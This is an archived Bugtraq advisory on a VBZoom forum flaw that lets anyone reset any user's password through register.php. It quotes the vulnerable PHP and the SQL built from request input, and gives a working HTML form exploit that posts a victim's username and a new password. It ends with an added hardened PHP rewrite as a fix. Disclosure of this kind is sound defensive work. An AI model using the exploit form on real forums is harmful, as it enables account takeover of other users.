Bugtraq mailing list archives

Reset any user's password in VBZoom forums


From: hish _ hish <hish_hish565 () hotmail com>
Date: 8 Oct 2002 19:41:07 -0000



Name:    VBZoom
Version Affected:  tested on v1.01; other versions may also be vulnerable
Severity:  Critical
Category: Password reset
Vendor URL:   http://www.vbzoom.com
Author:   hish_hish <hish_hish565 () hotmail com>
Date:   disclosed on 28th August 2002
         Published on 8th Oct 2002

Description
***********
VBZooM is a bulletin board system written in PHP.
The problem lies in an SQL query in the file register.php,
which lets anyone reset any user's password (see Details).
 
 
Details
*******
see these few lines from register.php:
1: If ($ChangeProfile==1 And ($VBZooMForumCookiesUserName=="" or 
2: $VBZooMForumCookiesUserName=="deleted"))
3: {
4: include("admin/config.php");
5: include("style/style.php");
6: Echo"<BR>";
 :
 :
9: include("login.php");   // wooow here will catch us, so we want to pass this block.
 :
 :
10: Exit();
11: }
 :
 :
14: if ($REQUEST_METHOD=="POST")
15: {
16: if($ChangeProfile==1 And $UserName!="")
17: {
18: include("admin/config.php");
19: $Connect =mysql_connect($DBHostName,$DBUserName,$DBPassword);
20: $Select =mysql_select_db($DBName,$Connect);
 :
 :
 :
24: $Sql = "UPDATE Member Set Password='$Password',Email='$Email',
        Gender='$Gender',Style='1',HomePage='$HomePage',Photo='$Photo',
        Icq='$Icq',Hotmail='$Hotmail',
        Yahoo='$Yahoo',BirthDate='$BirthDate',Country='$Country',Hobby='$Hobby',
        Job='$Job',Signature='$Signature',AllowEmail='$AllowEmail',
        AllowMail='$AllowMail',AllowMessage='$AllowMessage',
        AllowMailCaseMessage='$AllowMailCaseMessage' where UserName='$UserName'";
31: $Result = mysql_query($Sql);
32: If ($Result)
33: {
34: setcookie ("VBZooMForumCookiesUserName","$UserName",time()+604800);
35: setcookie ("VBZooMForumCookiesPassword", "$Password",time()+604800);

We do not want to execute the block between lines 3 and 11, so we pass values 
that make the if statement at line 1 false (the variables it tests, including 
$VBZooMForumCookiesUserName, are taken from the request, so a POSTed value 
overrides the cookie).
The lame SQL statement is at line 24, inside the block between lines 14 
and 35.
So we pass valid values to reach the SQL statement as follows:
   use <form method="POST" action="register.php">  // to enter the block at 
line 14
   assign 1 to the variable $ChangeProfile, and the victim's UserName to reset 
their password
   lines 18 - 20: no comment !!
   lines 24 - 35  :)
 
 
Exploit code
**************
<form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>
   
 
Fix Information
***************
Contact http://www.vbzoom.com
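As an added illustration (not VBZoom's code and not the vendor's fix), here is a hardened form of the update block from register.php: the row to modify is chosen by the server-side session rather than by a POSTed UserName or a request-supplied VBZooMForumCookiesUserName, values are bound instead of interpolated into the query, and a password change requires the current password and stores a hash. The session keys, the CSRF token, and the database credentials are assumptions.

```php
<?php
// Added example, not VBZoom's code: hardened version of the profile-update block.
// The row to update is chosen by the server-side session, never by a POSTed
// UserName or a VBZooMForumCookiesUserName value, and all values are bound
// parameters rather than being interpolated into the query string.
session_start();

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

// Assumption: login.php stores the authenticated name in $_SESSION['UserName'].
if (empty($_SESSION['UserName'])) {
    http_response_code(403);
    exit('Login required');
}

// Assumption: the profile form carried a per-session CSRF token.
if (!isset($_POST['csrf'], $_SESSION['csrf']) || !hash_equals($_SESSION['csrf'], $_POST['csrf'])) {
    http_response_code(403);
    exit('Bad request');
}

$email = filter_input(INPUT_POST, 'Email', FILTER_VALIDATE_EMAIL);
if ($email === null || $email === false) {
    exit('Invalid e-mail');
}
$homePage = filter_input(INPUT_POST, 'HomePage', FILTER_VALIDATE_URL) ?: '';

// Placeholder credentials; the original reads them from admin/config.php.
$db = new mysqli('DB_HOST', 'DB_USER', 'DB_PASS', 'DB_NAME');

// Same Member table and UserName key as the original, but keyed on the session.
$stmt = $db->prepare('UPDATE Member SET Email = ?, HomePage = ? WHERE UserName = ?');
$stmt->bind_param('sss', $email, $homePage, $_SESSION['UserName']);
$stmt->execute();

// Password change: verify the current password, store a hash (never plaintext in a cookie).
if (!empty($_POST['Password']) && isset($_POST['CurrentPassword'])) {
    $stmt = $db->prepare('SELECT Password FROM Member WHERE UserName = ?');
    $stmt->bind_param('s', $_SESSION['UserName']);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_row();
    if ($row && password_verify($_POST['CurrentPassword'], $row[0])) {
        $hash = password_hash($_POST['Password'], PASSWORD_DEFAULT);
        $stmt = $db->prepare('UPDATE Member SET Password = ? WHERE UserName = ?');
        $stmt->bind_param('ss', $hash, $_SESSION['UserName']);
        $stmt->execute();
    }
}
```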

